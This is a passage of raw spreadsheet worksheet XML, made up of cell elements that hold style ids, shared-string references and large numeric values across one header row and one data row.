      <c r="IR2" s="45" t="s">
        <v>727</v>
      </c>
      <c r="IS2" s="46" t="s">
        <v>723</v>
      </c>
      <c r="IT2" s="142" t="s">
        <v>724</v>
      </c>
      <c r="IU2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="IV2" s="47" t="s">
        <v>726</v>
      </c>
      <c r="IW2" s="47" t="s">
        <v>725</v>
      </c>
      <c r="IX2" s="45" t="s">
        <v>727</v>
      </c>
      <c r="IY2" s="46" t="s">
        <v>723</v>
      </c>
      <c r="IZ2" s="142" t="s">
        <v>724</v>
      </c>
      <c r="JA2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="JB2" s="47" t="s">
        <v>726</v>
      </c>
      <c r="JC2" s="47" t="s">
        <v>725</v>
      </c>
      <c r="JD2" s="45" t="s">
        <v>727</v>
      </c>
      <c r="JE2" s="46" t="s">
        <v>723</v>
      </c>
      <c r="JF2" s="142" t="s">
        <v>724</v>
      </c>
      <c r="JG2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="JH2" s="47" t="s">
        <v>726</v>
      </c>
      <c r="JI2" s="47" t="s">
        <v>725</v>
      </c>
      <c r="JJ2" s="45" t="s">
        <v>727</v>
      </c>
      <c r="JK2" s="46" t="s">
        <v>723</v>
      </c>
      <c r="JL2" s="142" t="s">
        <v>724</v>
      </c>
      <c r="JM2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="JN2" s="47" t="s">
        <v>726</v>
      </c>
      <c r="JO2" s="47" t="s">
        <v>725</v>
      </c>
      <c r="JP2" s="45" t="s">
        <v>727</v>
      </c>
      <c r="JQ2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="JR2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="JS2" s="143" t="s">
        <v>729</v>
      </c>
      <c r="JT2" s="326" t="s">
        <v>730</v>
      </c>
      <c r="JU2" s="327" t="s">
        <v>731</v>
      </c>
      <c r="JV2" s="327" t="s">
        <v>732</v>
      </c>
      <c r="JW2" s="327" t="s">
        <v>733</v>
      </c>
      <c r="JX2" s="327" t="s">
        <v>2274</v>
      </c>
      <c r="JY2" s="144" t="s">
        <v>734</v>
      </c>
      <c r="JZ2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="KA2" s="142" t="s">
        <v>728</v>
      </c>
      <c r="KB2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="KC2" s="143" t="s">
        <v>2410</v>
      </c>
      <c r="KD2" s="143" t="s">
        <v>2411</v>
      </c>
      <c r="KE2" s="327" t="s">
        <v>732</v>
      </c>
      <c r="KF2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="KG2" s="142" t="s">
        <v>728</v>
      </c>
      <c r="KH2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="KI2" s="143" t="s">
        <v>2410</v>
      </c>
      <c r="KJ2" s="143" t="s">
        <v>2411</v>
      </c>
      <c r="KK2" s="327" t="s">
        <v>732</v>
      </c>
      <c r="KL2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="KM2" s="142" t="s">
        <v>728</v>
      </c>
      <c r="KN2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="KO2" s="143" t="s">
        <v>2410</v>
      </c>
      <c r="KP2" s="143" t="s">
        <v>2411</v>
      </c>
      <c r="KQ2" s="327" t="s">
        <v>732</v>
      </c>
      <c r="KR2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="KS2" s="142" t="s">
        <v>728</v>
      </c>
      <c r="KT2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="KU2" s="143" t="s">
        <v>2410</v>
      </c>
      <c r="KV2" s="143" t="s">
        <v>2411</v>
      </c>
      <c r="KW2" s="327" t="s">
        <v>732</v>
      </c>
      <c r="KX2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="KY2" s="142" t="s">
        <v>728</v>
      </c>
      <c r="KZ2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="LA2" s="143" t="s">
        <v>2410</v>
      </c>
      <c r="LB2" s="143" t="s">
        <v>2411</v>
      </c>
      <c r="LC2" s="327" t="s">
        <v>732</v>
      </c>
      <c r="LD2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="LE2" s="142" t="s">
        <v>2412</v>
      </c>
      <c r="LF2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="LG2" s="143" t="s">
        <v>2413</v>
      </c>
      <c r="LH2" s="143" t="s">
        <v>2414</v>
      </c>
      <c r="LI2" s="327" t="s">
        <v>2415</v>
      </c>
      <c r="LJ2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="LK2" s="142" t="s">
        <v>2412</v>
      </c>
      <c r="LL2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="LM2" s="143" t="s">
        <v>2413</v>
      </c>
      <c r="LN2" s="143" t="s">
        <v>2414</v>
      </c>
      <c r="LO2" s="327" t="s">
        <v>2415</v>
      </c>
      <c r="LP2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="LQ2" s="142" t="s">
        <v>2412</v>
      </c>
      <c r="LR2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="LS2" s="143" t="s">
        <v>2413</v>
      </c>
      <c r="LT2" s="143" t="s">
        <v>2414</v>
      </c>
      <c r="LU2" s="327" t="s">
        <v>2415</v>
      </c>
      <c r="LV2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="LW2" s="142" t="s">
        <v>2412</v>
      </c>
      <c r="LX2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="LY2" s="143" t="s">
        <v>2413</v>
      </c>
      <c r="LZ2" s="143" t="s">
        <v>2414</v>
      </c>
      <c r="MA2" s="327" t="s">
        <v>2415</v>
      </c>
      <c r="MB2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="MC2" s="142" t="s">
        <v>2412</v>
      </c>
      <c r="MD2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="ME2" s="143" t="s">
        <v>2413</v>
      </c>
      <c r="MF2" s="143" t="s">
        <v>2414</v>
      </c>
      <c r="MG2" s="327" t="s">
        <v>2415</v>
      </c>
      <c r="MH2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="MI2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="MJ2" s="143" t="s">
        <v>736</v>
      </c>
      <c r="MK2" s="326" t="s">
        <v>730</v>
      </c>
      <c r="ML2" s="327" t="s">
        <v>737</v>
      </c>
      <c r="MM2" s="327" t="s">
        <v>738</v>
      </c>
      <c r="MN2" s="327" t="s">
        <v>733</v>
      </c>
      <c r="MO2" s="327" t="s">
        <v>2275</v>
      </c>
      <c r="MP2" s="144" t="s">
        <v>734</v>
      </c>
      <c r="MQ2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="MR2" s="142" t="s">
        <v>735</v>
      </c>
      <c r="MS2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="MT2" s="143" t="s">
        <v>2416</v>
      </c>
      <c r="MU2" s="143" t="s">
        <v>2417</v>
      </c>
      <c r="MV2" s="462" t="s">
        <v>738</v>
      </c>
      <c r="MW2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="MX2" s="142" t="s">
        <v>735</v>
      </c>
      <c r="MY2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="MZ2" s="143" t="s">
        <v>2416</v>
      </c>
      <c r="NA2" s="143" t="s">
        <v>2417</v>
      </c>
      <c r="NB2" s="462" t="s">
        <v>738</v>
      </c>
      <c r="NC2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="ND2" s="142" t="s">
        <v>735</v>
      </c>
      <c r="NE2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="NF2" s="143" t="s">
        <v>2416</v>
      </c>
      <c r="NG2" s="143" t="s">
        <v>2417</v>
      </c>
      <c r="NH2" s="462" t="s">
        <v>738</v>
      </c>
      <c r="NI2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="NJ2" s="142" t="s">
        <v>735</v>
      </c>
      <c r="NK2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="NL2" s="143" t="s">
        <v>2416</v>
      </c>
      <c r="NM2" s="143" t="s">
        <v>2417</v>
      </c>
      <c r="NN2" s="462" t="s">
        <v>738</v>
      </c>
      <c r="NO2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="NP2" s="142" t="s">
        <v>735</v>
      </c>
      <c r="NQ2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="NR2" s="143" t="s">
        <v>2416</v>
      </c>
      <c r="NS2" s="143" t="s">
        <v>2417</v>
      </c>
      <c r="NT2" s="462" t="s">
        <v>738</v>
      </c>
      <c r="NU2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="NV2" s="142" t="s">
        <v>2412</v>
      </c>
      <c r="NW2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="NX2" s="143" t="s">
        <v>2413</v>
      </c>
      <c r="NY2" s="143" t="s">
        <v>2418</v>
      </c>
      <c r="NZ2" s="462" t="s">
        <v>2415</v>
      </c>
      <c r="OA2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="OB2" s="142" t="s">
        <v>2412</v>
      </c>
      <c r="OC2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="OD2" s="143" t="s">
        <v>2413</v>
      </c>
      <c r="OE2" s="143" t="s">
        <v>2418</v>
      </c>
      <c r="OF2" s="462" t="s">
        <v>2415</v>
      </c>
      <c r="OG2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="OH2" s="142" t="s">
        <v>2412</v>
      </c>
      <c r="OI2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="OJ2" s="143" t="s">
        <v>2413</v>
      </c>
      <c r="OK2" s="143" t="s">
        <v>2418</v>
      </c>
      <c r="OL2" s="462" t="s">
        <v>2415</v>
      </c>
      <c r="OM2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="ON2" s="142" t="s">
        <v>2412</v>
      </c>
      <c r="OO2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="OP2" s="143" t="s">
        <v>2413</v>
      </c>
      <c r="OQ2" s="143" t="s">
        <v>2418</v>
      </c>
      <c r="OR2" s="462" t="s">
        <v>2415</v>
      </c>
      <c r="OS2" s="328" t="s">
        <v>723</v>
      </c>
      <c r="OT2" s="142" t="s">
        <v>2412</v>
      </c>
      <c r="OU2" s="142" t="s">
        <v>4135</v>
      </c>
      <c r="OV2" s="143" t="s">
        <v>2413</v>
      </c>
      <c r="OW2" s="143" t="s">
        <v>2418</v>
      </c>
      <c r="OX2" s="462" t="s">
        <v>2415</v>
      </c>
    </row>
    <row r="3" spans="1:414" ht="408.75" customHeight="1">
      <c r="A3" s="52" t="s">
        <v>1739</v>
      </c>
      <c r="B3" s="53" t="s">
        <v>1740</v>
      </c>
      <c r="C3" s="54" t="s">
        <v>1741</v>
      </c>
      <c r="D3" s="54">
        <v>78694206</v>
      </c>
      <c r="E3" s="54"/>
      <c r="F3" s="55"/>
      <c r="G3" s="56">
        <v>9778069</v>
      </c>
      <c r="H3" s="515" t="s">
        <v>4488</v>
      </c>
      <c r="I3" s="515">
        <v>8620288</v>
      </c>
      <c r="J3" s="57" t="s">
        <v>4489</v>
      </c>
      <c r="K3" s="58">
        <v>22</v>
      </c>
      <c r="L3" s="59">
        <v>3391362</v>
      </c>
      <c r="M3" s="60">
        <v>5500009</v>
      </c>
      <c r="N3" s="516" t="s">
        <v>4490</v>
      </c>
      <c r="O3" s="516">
        <v>5136879</v>
      </c>
      <c r="P3" s="61" t="s">
        <v>4491</v>
      </c>
      <c r="Q3" s="62">
        <v>71</v>
      </c>
      <c r="R3" s="63">
        <v>4719941</v>
      </c>
      <c r="S3" s="64">
        <v>15278078</v>
      </c>
      <c r="T3" s="64" t="s">
        <v>4492</v>
      </c>
      <c r="U3" s="64">
        <v>13757167</v>
      </c>
      <c r="V3" s="65" t="s">
        <v>4493</v>
      </c>
      <c r="W3" s="66">
        <v>93</v>
      </c>
      <c r="X3" s="67">
        <v>7276338</v>
      </c>
      <c r="Y3" s="68">
        <v>15309135</v>
      </c>
      <c r="Z3" s="517" t="s">
        <v>4494</v>
      </c>
      <c r="AA3" s="517">
        <v>13128811</v>
      </c>
      <c r="AB3" s="69" t="s">
        <v>4495</v>
      </c>
      <c r="AC3" s="70">
        <v>214</v>
      </c>
      <c r="AD3" s="71">
        <v>6879262</v>
      </c>
      <c r="AE3" s="255">
        <v>14539188</v>
      </c>
      <c r="AF3" s="518" t="s">
        <v>4496</v>
      </c>
      <c r="AG3" s="518">
        <v>13066562</v>
      </c>
      <c r="AH3" s="256" t="s">
        <v>4497</v>
      </c>
      <c r="AI3" s="257">
        <v>229</v>
      </c>
      <c r="AJ3" s="258">
        <v>6115454</v>
      </c>
      <c r="AK3" s="56">
        <v>29848323</v>
      </c>
      <c r="AL3" s="515" t="s">
        <v>4498</v>
      </c>
      <c r="AM3" s="515">
        <v>26195373</v>
      </c>
      <c r="AN3" s="57" t="s">
        <v>4499</v>
      </c>
      <c r="AO3" s="58">
        <v>443</v>
      </c>
      <c r="AP3" s="59">
        <v>9478500</v>
      </c>
      <c r="AQ3" s="60">
        <v>6990</v>
      </c>
      <c r="AR3" s="516" t="s">
        <v>4121</v>
      </c>
      <c r="AS3" s="516">
        <v>6420</v>
      </c>
      <c r="AT3" s="61" t="s">
        <v>1925</v>
      </c>
      <c r="AU3" s="62">
        <v>2</v>
      </c>
      <c r="AV3" s="63">
        <v>6398</v>
      </c>
      <c r="AW3" s="64">
        <v>8738223</v>
      </c>
      <c r="AX3" s="64" t="s">
        <v>4500</v>
      </c>
      <c r="AY3" s="64">
        <v>7505544</v>
      </c>
      <c r="AZ3" s="65" t="s">
        <v>4119</v>
      </c>
      <c r="BA3" s="66">
        <v>63</v>
      </c>
      <c r="BB3" s="67">
        <v>7470907</v>
      </c>
      <c r="BC3" s="68">
        <v>24009324</v>
      </c>
      <c r="BD3" s="517" t="s">
        <v>4501</v>
      </c>
      <c r="BE3" s="517">
        <v>21256304</v>
      </c>
      <c r="BF3" s="69" t="s">
        <v>4502</v>
      </c>
      <c r="BG3" s="70">
        <v>154</v>
      </c>
      <c r="BH3" s="71">
        <v>10855081</v>
      </c>
      <c r="BI3" s="162">
        <v>6987</v>
      </c>
      <c r="BJ3" s="163" t="s">
        <v>4503</v>
      </c>
      <c r="BK3" s="163">
        <v>6417</v>
      </c>
      <c r="BL3" s="164" t="s">
        <v>4120</v>
      </c>
      <c r="BM3" s="164">
        <v>3</v>
      </c>
      <c r="BN3" s="165">
        <v>6395</v>
      </c>
      <c r="BO3" s="166">
        <v>338711</v>
      </c>
      <c r="BP3" s="167" t="s">
        <v>4504</v>
      </c>
      <c r="BQ3" s="496">
        <v>338311</v>
      </c>
      <c r="BR3" s="168" t="s">
        <v>4505</v>
      </c>
      <c r="BS3" s="168">
        <v>13</v>
      </c>
      <c r="BT3" s="169">
        <v>169036</v>
      </c>
      <c r="BU3" s="170">
        <v>345698</v>
      </c>
      <c r="BV3" s="171" t="s">
        <v>4506</v>
      </c>
      <c r="BW3" s="500">
        <v>344728</v>
      </c>
      <c r="BX3" s="172" t="s">
        <v>4507</v>
      </c>
      <c r="BY3" s="172">
        <v>16</v>
      </c>
      <c r="BZ3" s="173">
        <v>175400</v>
      </c>
      <c r="CA3" s="174">
        <v>2527690</v>
      </c>
      <c r="CB3" s="175" t="s">
        <v>4508</v>
      </c>
      <c r="CC3" s="502">
        <v>2445673</v>
      </c>
      <c r="CD3" s="176" t="s">
        <v>4509</v>
      </c>
      <c r="CE3" s="176">
        <v>79</v>
      </c>
      <c r="CF3" s="122">
        <v>1067860</v>
      </c>
      <c r="CG3" s="246">
        <v>673827</v>
      </c>
      <c r="CH3" s="247" t="s">
        <v>4510</v>
      </c>
      <c r="CI3" s="504">
        <v>571742</v>
      </c>
      <c r="CJ3" s="248" t="s">
        <v>4511</v>
      </c>
      <c r="CK3" s="248">
        <v>42</v>
      </c>
      <c r="CL3" s="249">
        <v>421616</v>
      </c>
      <c r="CM3" s="162">
        <v>3201517</v>
      </c>
      <c r="CN3" s="163" t="s">
        <v>4512</v>
      </c>
      <c r="CO3" s="163">
        <v>3017415</v>
      </c>
      <c r="CP3" s="164" t="s">
        <v>4513</v>
      </c>
      <c r="CQ3" s="164">
        <v>121</v>
      </c>
      <c r="CR3" s="165">
        <v>1243621</v>
      </c>
      <c r="CS3" s="166">
        <v>6990</v>
      </c>
      <c r="CT3" s="167" t="s">
        <v>4121</v>
      </c>
      <c r="CU3" s="496">
        <v>6420</v>
      </c>
      <c r="CV3" s="168" t="s">
        <v>1925</v>
      </c>
      <c r="CW3" s="168">
        <v>2</v>
      </c>
      <c r="CX3" s="169">
        <v>6398</v>
      </c>
      <c r="CY3" s="170">
        <v>21553</v>
      </c>
      <c r="CZ3" s="171" t="s">
        <v>4122</v>
      </c>
      <c r="DA3" s="500">
        <v>14558</v>
      </c>
      <c r="DB3" s="172" t="s">
        <v>4123</v>
      </c>
      <c r="DC3" s="172">
        <v>10</v>
      </c>
      <c r="DD3" s="173">
        <v>14498</v>
      </c>
      <c r="DE3" s="174">
        <v>360274</v>
      </c>
      <c r="DF3" s="175" t="s">
        <v>4514</v>
      </c>
      <c r="DG3" s="502">
        <v>352879</v>
      </c>
      <c r="DH3" s="176" t="s">
        <v>4515</v>
      </c>
      <c r="DI3" s="176">
        <v>24</v>
      </c>
      <c r="DJ3" s="122">
        <v>182455</v>
      </c>
      <c r="DK3" s="162">
        <v>2851410</v>
      </c>
      <c r="DL3" s="163" t="s">
        <v>4516</v>
      </c>
      <c r="DM3" s="163">
        <v>1732132</v>
      </c>
      <c r="DN3" s="164" t="s">
        <v>4517</v>
      </c>
      <c r="DO3" s="164">
        <v>12</v>
      </c>
      <c r="DP3" s="165">
        <v>1686365</v>
      </c>
      <c r="DQ3" s="166">
        <v>46746</v>
      </c>
      <c r="DR3" s="167" t="s">
        <v>4124</v>
      </c>
      <c r="DS3" s="496">
        <v>42972</v>
      </c>
      <c r="DT3" s="168" t="s">
        <v>4125</v>
      </c>
      <c r="DU3" s="168">
        <v>32</v>
      </c>
      <c r="DV3" s="169">
        <v>35360</v>
      </c>
      <c r="DW3" s="170">
        <v>2898156</v>
      </c>
      <c r="DX3" s="171" t="s">
        <v>4518</v>
      </c>
      <c r="DY3" s="500">
        <v>1775104</v>
      </c>
      <c r="DZ3" s="172" t="s">
        <v>4519</v>
      </c>
      <c r="EA3" s="172">
        <v>44</v>
      </c>
      <c r="EB3" s="173">
        <v>1721581</v>
      </c>
      <c r="EC3" s="174">
        <v>5358376</v>
      </c>
      <c r="ED3" s="175" t="s">
        <v>4520</v>
      </c>
      <c r="EE3" s="502">
        <v>3574857</v>
      </c>
      <c r="EF3" s="176" t="s">
        <v>4521</v>
      </c>
      <c r="EG3" s="176">
        <v>76</v>
      </c>
      <c r="EH3" s="122">
        <v>3290755</v>
      </c>
      <c r="EI3" s="246">
        <v>3514537</v>
      </c>
      <c r="EJ3" s="247" t="s">
        <v>4522</v>
      </c>
      <c r="EK3" s="504">
        <v>2727582</v>
      </c>
      <c r="EL3" s="248" t="s">
        <v>4523</v>
      </c>
      <c r="EM3" s="248">
        <v>118</v>
      </c>
      <c r="EN3" s="249">
        <v>2605017</v>
      </c>
      <c r="EO3" s="162">
        <v>8872913</v>
      </c>
      <c r="EP3" s="163" t="s">
        <v>4524</v>
      </c>
      <c r="EQ3" s="163">
        <v>6302439</v>
      </c>
      <c r="ER3" s="164" t="s">
        <v>4525</v>
      </c>
      <c r="ES3" s="164">
        <v>194</v>
      </c>
      <c r="ET3" s="165">
        <v>5090379</v>
      </c>
      <c r="EU3" s="166">
        <v>0</v>
      </c>
      <c r="EV3" s="167">
        <v>0</v>
      </c>
      <c r="EW3" s="496">
        <v>0</v>
      </c>
      <c r="EX3" s="168">
        <v>0</v>
      </c>
      <c r="EY3" s="168">
        <v>0</v>
      </c>
      <c r="EZ3" s="169">
        <v>0</v>
      </c>
      <c r="FA3" s="170">
        <v>4671067</v>
      </c>
      <c r="FB3" s="171" t="s">
        <v>4526</v>
      </c>
      <c r="FC3" s="500">
        <v>3917505</v>
      </c>
      <c r="FD3" s="172" t="s">
        <v>4126</v>
      </c>
      <c r="FE3" s="172">
        <v>29</v>
      </c>
      <c r="FF3" s="173">
        <v>3914459</v>
      </c>
      <c r="FG3" s="174">
        <v>7569223</v>
      </c>
      <c r="FH3" s="175" t="s">
        <v>4527</v>
      </c>
      <c r="FI3" s="502">
        <v>5692609</v>
      </c>
      <c r="FJ3" s="176" t="s">
        <v>4528</v>
      </c>
      <c r="FK3" s="176">
        <v>73</v>
      </c>
      <c r="FL3" s="122">
        <v>5296452</v>
      </c>
      <c r="FM3" s="162">
        <v>6919672</v>
      </c>
      <c r="FN3" s="163" t="s">
        <v>4529</v>
      </c>
      <c r="FO3" s="163">
        <v>6881739</v>
      </c>
      <c r="FP3" s="164" t="s">
        <v>4530</v>
      </c>
      <c r="FQ3" s="164">
        <v>10</v>
      </c>
      <c r="FR3" s="165">
        <v>2468551</v>
      </c>
      <c r="FS3" s="166">
        <v>5114552</v>
      </c>
      <c r="FT3" s="167" t="s">
        <v>4531</v>
      </c>
      <c r="FU3" s="496">
        <v>4755596</v>
      </c>
      <c r="FV3" s="168" t="s">
        <v>4127</v>
      </c>
      <c r="FW3" s="168">
        <v>26</v>
      </c>
      <c r="FX3" s="169">
        <v>4683472</v>
      </c>
      <c r="FY3" s="170">
        <v>12034224</v>
      </c>
      <c r="FZ3" s="171" t="s">
        <v>4532</v>
      </c>
      <c r="GA3" s="500">
        <v>11637335</v>
      </c>
      <c r="GB3" s="172" t="s">
        <v>4533</v>
      </c>
      <c r="GC3" s="172">
        <v>36</v>
      </c>
      <c r="GD3" s="173">
        <v>7151854</v>
      </c>
      <c r="GE3" s="174">
        <v>7423069</v>
      </c>
      <c r="GF3" s="175" t="s">
        <v>4534</v>
      </c>
      <c r="GG3" s="502">
        <v>7108281</v>
      </c>
      <c r="GH3" s="176" t="s">
        <v>4535</v>
      </c>
      <c r="GI3" s="176">
        <v>63</v>
      </c>
      <c r="GJ3" s="122">
        <v>3778862</v>
      </c>
      <c r="GK3" s="246">
        <v>10350824</v>
      </c>
      <c r="GL3" s="247" t="s">
        <v>4536</v>
      </c>
      <c r="GM3" s="504">
        <v>9767238</v>
      </c>
      <c r="GN3" s="248" t="s">
        <v>4537</v>
      </c>
      <c r="GO3" s="248">
        <v>69</v>
      </c>
      <c r="GP3" s="249">
        <v>3628848</v>
      </c>
      <c r="GQ3" s="162">
        <v>17773893</v>
      </c>
      <c r="GR3" s="163" t="s">
        <v>4538</v>
      </c>
      <c r="GS3" s="163">
        <v>16875519</v>
      </c>
      <c r="GT3" s="164" t="s">
        <v>4539</v>
      </c>
      <c r="GU3" s="164">
        <v>132</v>
      </c>
      <c r="GV3" s="165">
        <v>5330541</v>
      </c>
      <c r="GW3" s="166">
        <v>0</v>
      </c>
      <c r="GX3" s="167">
        <v>0</v>
      </c>
      <c r="GY3" s="496">
        <v>0</v>
      </c>
      <c r="GZ3" s="168">
        <v>0</v>
      </c>
      <c r="HA3" s="168">
        <v>0</v>
      </c>
      <c r="HB3" s="169">
        <v>0</v>
      </c>
      <c r="HC3" s="170">
        <v>4045603</v>
      </c>
      <c r="HD3" s="171" t="s">
        <v>4540</v>
      </c>
      <c r="HE3" s="500">
        <v>3573481</v>
      </c>
      <c r="HF3" s="172" t="s">
        <v>4128</v>
      </c>
      <c r="HG3" s="172">
        <v>24</v>
      </c>
      <c r="HH3" s="173">
        <v>3557887</v>
      </c>
      <c r="HI3" s="174">
        <v>16079827</v>
      </c>
      <c r="HJ3" s="175" t="s">
        <v>4541</v>
      </c>
      <c r="HK3" s="502">
        <v>15210816</v>
      </c>
      <c r="HL3" s="176" t="s">
        <v>4542</v>
      </c>
      <c r="HM3" s="176">
        <v>60</v>
      </c>
      <c r="HN3" s="122">
        <v>7186417</v>
      </c>
      <c r="HO3" s="162">
        <v>0</v>
      </c>
      <c r="HP3" s="163">
        <v>0</v>
      </c>
      <c r="HQ3" s="163">
        <v>0</v>
      </c>
      <c r="HR3" s="164">
        <v>0</v>
      </c>
      <c r="HS3" s="164">
        <v>0</v>
      </c>
      <c r="HT3" s="165">
        <v>0</v>
      </c>
      <c r="HU3" s="166">
        <v>0</v>
      </c>
      <c r="HV3" s="167">
        <v>0</v>
      </c>
      <c r="HW3" s="496">
        <v>0</v>
      </c>
      <c r="HX3" s="168">
        <v>0</v>
      </c>
      <c r="HY3" s="168">
        <v>0</v>
      </c>
      <c r="HZ3" s="169">
        <v>0</v>
      </c>
      <c r="IA3" s="170">
        <v>0</v>
      </c>
      <c r="IB3" s="171">
        <v>0</v>
      </c>
      <c r="IC3" s="500">
        <v>0</v>
      </c>
      <c r="ID3" s="172">
        <v>0</v>
      </c>
      <c r="IE3" s="172">
        <v>0</v>
      </c>
      <c r="IF3" s="173">
        <v>0</v>
      </c>
      <c r="IG3" s="174">
        <v>0</v>
      </c>
      <c r="IH3" s="175">
        <v>0</v>
      </c>
      <c r="II3" s="502">
        <v>0</v>
      </c>
      <c r="IJ3" s="176">
        <v>0</v>
      </c>
      <c r="IK3" s="176">
        <v>0</v>
      </c>
      <c r="IL3" s="122">
        <v>0</v>
      </c>
      <c r="IM3" s="246">
        <v>0</v>
      </c>
      <c r="IN3" s="247">
        <v>0</v>
      </c>
      <c r="IO3" s="504">
        <v>0</v>
      </c>
      <c r="IP3" s="248">
        <v>0</v>
      </c>
      <c r="IQ3" s="248">
        <v>0</v>
      </c>
      <c r="IR3" s="249">
        <v>0</v>
      </c>
      <c r="IS3" s="162">
        <v>0</v>
      </c>
      <c r="IT3" s="163">
        <v>0</v>
      </c>
      <c r="IU3" s="163">
        <v>0</v>
      </c>
      <c r="IV3" s="164">
        <v>0</v>
      </c>
      <c r="IW3" s="164">
        <v>0</v>
      </c>
      <c r="IX3" s="165">
        <v>0</v>
      </c>
      <c r="IY3" s="166">
        <v>0</v>
      </c>
      <c r="IZ3" s="167">
        <v>0</v>
      </c>
      <c r="JA3" s="496">
        <v>0</v>
      </c>
      <c r="JB3" s="168">
        <v>0</v>
      </c>
      <c r="JC3" s="168">
        <v>0</v>
      </c>
      <c r="JD3" s="169">
        <v>0</v>
      </c>
      <c r="JE3" s="170">
        <v>0</v>
      </c>
      <c r="JF3" s="171">
        <v>0</v>
      </c>
      <c r="JG3" s="500">
        <v>0</v>
      </c>
      <c r="JH3" s="172">
        <v>0</v>
      </c>
      <c r="JI3" s="172">
        <v>0</v>
      </c>
      <c r="JJ3" s="173">
        <v>0</v>
      </c>
      <c r="JK3" s="174">
        <v>0</v>
      </c>
      <c r="JL3" s="175">
        <v>0</v>
      </c>
      <c r="JM3" s="502">
        <v>0</v>
      </c>
      <c r="JN3" s="176">
        <v>0</v>
      </c>
      <c r="JO3" s="176">
        <v>0</v>
      </c>
      <c r="JP3" s="122">
        <v>0</v>
      </c>
      <c r="JQ3" s="177">
        <v>25983916</v>
      </c>
      <c r="JR3" s="506">
        <v>25704108</v>
      </c>
      <c r="JS3" s="179">
        <v>30</v>
      </c>
      <c r="JT3" s="179">
        <v>134</v>
      </c>
      <c r="JU3" s="179">
        <v>18641102</v>
      </c>
      <c r="JV3" s="179">
        <v>4412536</v>
      </c>
      <c r="JW3" s="179">
        <v>18609281</v>
      </c>
      <c r="JX3" s="179">
        <v>18610671</v>
      </c>
      <c r="JY3" s="376"/>
      <c r="JZ3" s="177">
        <v>20834</v>
      </c>
      <c r="KA3" s="178">
        <v>20834</v>
      </c>
      <c r="KB3" s="506">
        <v>17781</v>
      </c>
      <c r="KC3" s="179" t="s">
        <v>4293</v>
      </c>
      <c r="KD3" s="179">
        <v>4</v>
      </c>
      <c r="KE3" s="179">
        <v>17780</v>
      </c>
      <c r="KF3" s="177">
        <v>7829</v>
      </c>
      <c r="KG3" s="178">
        <v>7829</v>
      </c>
      <c r="KH3" s="506">
        <v>7613</v>
      </c>
      <c r="KI3" s="179" t="s">
        <v>4294</v>
      </c>
      <c r="KJ3" s="179">
        <v>14</v>
      </c>
      <c r="KK3" s="179">
        <v>7613</v>
      </c>
      <c r="KL3" s="177">
        <v>172408</v>
      </c>
      <c r="KM3" s="178">
        <v>172408</v>
      </c>
      <c r="KN3" s="506">
        <v>171888</v>
      </c>
      <c r="KO3" s="179" t="s">
        <v>4295</v>
      </c>
      <c r="KP3" s="179">
        <v>2</v>
      </c>
      <c r="KQ3" s="179">
        <v>171887</v>
      </c>
      <c r="KR3" s="177">
        <v>4055548</v>
      </c>
      <c r="KS3" s="178">
        <v>4055548</v>
      </c>
      <c r="KT3" s="506">
        <v>4037207</v>
      </c>
      <c r="KU3" s="179" t="s">
        <v>4296</v>
      </c>
      <c r="KV3" s="179">
        <v>4</v>
      </c>
      <c r="KW3" s="179">
        <v>4037207</v>
      </c>
      <c r="KX3" s="177">
        <v>189068</v>
      </c>
      <c r="KY3" s="178">
        <v>189068</v>
      </c>
      <c r="KZ3" s="506">
        <v>186956</v>
      </c>
      <c r="LA3" s="179" t="s">
        <v>4297</v>
      </c>
      <c r="LB3" s="179">
        <v>6</v>
      </c>
      <c r="LC3" s="179">
        <v>186956</v>
      </c>
      <c r="LD3" s="177">
        <v>0</v>
      </c>
      <c r="LE3" s="178">
        <v>0</v>
      </c>
      <c r="LF3" s="506">
        <v>0</v>
      </c>
      <c r="LG3" s="179">
        <v>0</v>
      </c>
      <c r="LH3" s="179">
        <v>0</v>
      </c>
      <c r="LI3" s="179">
        <v>0</v>
      </c>
      <c r="LJ3" s="177">
        <v>395008</v>
      </c>
      <c r="LK3" s="178">
        <v>395008</v>
      </c>
      <c r="LL3" s="506">
        <v>352503</v>
      </c>
